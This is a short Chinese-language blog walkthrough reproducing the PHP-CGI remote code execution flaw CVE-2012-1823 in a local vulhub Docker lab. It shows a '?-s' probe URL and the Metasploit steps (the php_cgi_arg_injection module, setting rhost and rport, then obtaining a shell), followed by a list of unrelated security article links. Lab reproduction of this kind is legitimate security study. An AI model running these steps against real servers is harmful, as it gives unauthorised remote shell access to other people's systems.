CVE-2012-1823漏洞复现

进入下面目录/home/kali/vulhub/php/CVE-2012-1823

启动docker

bash 复制代码
sudo docker-compose up -d

可以看到已经启动了。

在浏览器输入http://127.0.0.1:8080/

可以看到正常启动了。在浏览器输入http://127.0.0.1:8080/?-s

说明是有漏洞的。

在控制台输入msfconsole,等一会。

输入search php cgi

注意看第24条exploit/multi/http/php_cgi_arg_injection。执行

bash 复制代码
use exploit/multi/http/php_cgi_arg_injection

设置rhost , rport ,查看options

运行run

进入shell,可以使用ls cd pwd whoami等命令。

参考

PHP-CGI远程代码执行漏洞(CVE-2012-1823)漏洞复现 - Junglezt - 博客园

相关推荐
treesforest10 小时前
公开IP属地后我们应该如何保护自身网络安全?
tcp/ip·安全·web安全·ip属地·查ip归属地
九硕智慧建筑一体化厂家1 天前
直流智能照明|一站式低碳照明解决方案,安全、节能、降本、全场景适配
安全
小程故事多_801 天前
算力工厂与安全沙箱,企业AI规模化落地的两条核心生命线
人工智能·安全
牛马工作号1 天前
Zigbee 专业详解:从协议到排障
网络·物联网·安全
延凡科技1 天前
智慧燃气解决方案:管道煤气监管应用管理系统(三维GIS+IoT+大数据落地实战)
大数据·人工智能·科技·物联网·安全
spear8001 天前
高压绝缘测试安全指南:击穿保护、燃弧定位、快速放电、抗干扰滤波详解
安全·绝缘电阻·三级承装承修承试资质公司设备·电缆绝缘电阻
liukuang1101 天前
Zara“夺命裤”风波,白晨铭的安全大考
安全
Android小码家1 天前
OWASP 移动应用安全之授权(MASTG-DEMO-0090)
android·安全·frida
Multipath7121 天前
智能巡检机器人多链路聚合路由解决方案
网络·5g·安全·实时音视频·信息与通信
学习溢出1 天前
【网络安全】Living off the Land 攻击 | 蓝队防守
安全·web安全·网络安全